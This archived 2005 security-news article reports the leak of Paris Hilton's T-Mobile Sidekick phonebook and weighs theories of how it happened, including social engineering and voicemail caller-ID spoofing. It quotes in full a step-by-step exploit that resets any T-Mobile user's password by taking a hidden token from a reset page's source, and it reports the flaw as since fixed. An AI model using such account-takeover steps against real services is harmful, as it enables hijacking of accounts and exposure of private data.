R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Thursday, 2nd October 2014 @ 13:25:38 GMT 
Reports | Paris Hilton's phonebook hacked, posted online (+ how it could have been done)
{21st Feb 2005}
T-Mobile was yesterday involved in yet another high profile compromise of customer data.

It comes within a week of Nicholas Jacobsen, 22 pleading guilty in the United States Los Angeles District Court for his unauthorised access of the T-Mobile system from October 2003 which involved various Hollywood celebrities, and a secret service agent however the data was not made widely publicly available.

The phone book, email addresses, and notes from celebrity Paris Hilton?s T-Mobile Sidekick were posted on the web, and rapidly circulated by various online news websites / blogs including Engadget and Gizmodo with perhaps a questionable disregard of privacy for Paris Hilton herself and everyone in her address book that will likely be forced to change their phone numbers / email addresses as a result (the address book contained 510 entries including Lindsay Lohan, Avril Lavigne and Christina Aguilera). Soon after the original site ran out of bandwidth but fans quickly setup mirrors however shortly after they too started falling like flies after being shutdown by service providers / taken offline due to the high volume of traffic they were receiving.

The Sidekick II stores all its information on T-Mobiles servers (rather than the usual practice of storing it on the phone itself), and it was through the web interface to this service that the data was exposed. Various theories have been popping up around the web as to how it occurred - a smooth talking social engineer (According to F-Secure the text ?The previous information was obtained using social engineering tactics? appeared on the original mirror), or someone related to Nicholas Jacobsen who had access to the information the first time round. The second is unlikely since the address book as leaked in the form of HTML web pages bore the date February 19th 2005. There is also a third possibility that another intruder independently accessed the T-Mobile site using a vulnerability still in existence on the T-Mobile website, the possibility of which was widely reported just 2 days prior.

In a bazaar twist to the story the celebritie's Sidekick notes contained the K7 voicemail box of renown phreaker (phone hacker) / 2600 Magazine writer Lucky225 who in a gesture of good faith previously informed her about the insecurities of the T-Mobile voicemail system (it is possible to callerid spoof and access an individuals messages as if you had their phone, ie without a password if you have none set, according to an advisory posted on Full Disclosure from Secure Science Corporation). Once the phone book became public the phreaker even changed his own voicemail greeting in anticipation of those that would call after seeing it online.

Yes I left her a message back in October a couple days before the Security Focus article on T-Mobile voicemail vulnerability came out. I tried to warn her voicemail was insecure.

After being contacted for comment, Lucky225 pointed Rootsecure.net to a zip file on illmob.org, containing what appears to be a T-Mobile account scanner / exploiter utility and a text file labelled ?Tmobile Acct. PW Reset Exploit? containing step by step instructions (due to lack of a Sidekick it was not possible to verify them either way) on resetting any T-Mobile users password:

Tmobile Acct. PW Reset Exploit
-Authors: Team Screen Name
-Found: 3/20/2004
-Released: N/A

-Introduction

This exploit is quite simple, you can gain access to anyones tmobile account via their website, tmobile.com, which could be used to get account information or even view calls that the person received or transmitted.

-Details on the discovery of this exploit

The discovery of this exploit was quite simple, while viewing the few links on tmobile site which deal with account help, checking out the html and the data transmitted with each link, we discovered that this was quite a simple exploit to achieve.

-Procedure

Visit http://sidekick.t-mobile.com/pocketpc/forgot_pswd.asp?Source=PDA_VS
Leave the username blank.
Type in the phone # you wish to takeover.
Submit this form.

On the ASQ page view source.
Search for "token".
IE: <input type="hidden" name="token" value="KLJfkjlBERToEHRIHWOR73t&BWERKJ@^*$7WORUt79@$">
Extract the token value from this line (remove the <input type="hidden" name="token" value=" and the "> at the end
Save this token in your clipboard because you will need it.

Visit https://wipcore.t-mobile.com/pdaPassUpdate.jsp?token=THETOKENYOUSAVED
Input the token in the string above.
Reset the password and the ASQ.

Login in via Tmobile.com

Have a nice day ;)

[Tmobile Exploit.txt]


Lucky225 stated that according to information he received the illmob exploit is a year old, and has been fixed (according to the website it was posted in the ?0 day? section on October 19th 2004).

In an age of growing technological advancement with more and more data being collected and stored on every citizen in massive centrally accessible databases, both consumers and businesses must weigh the risks against the benefits and act responsibly.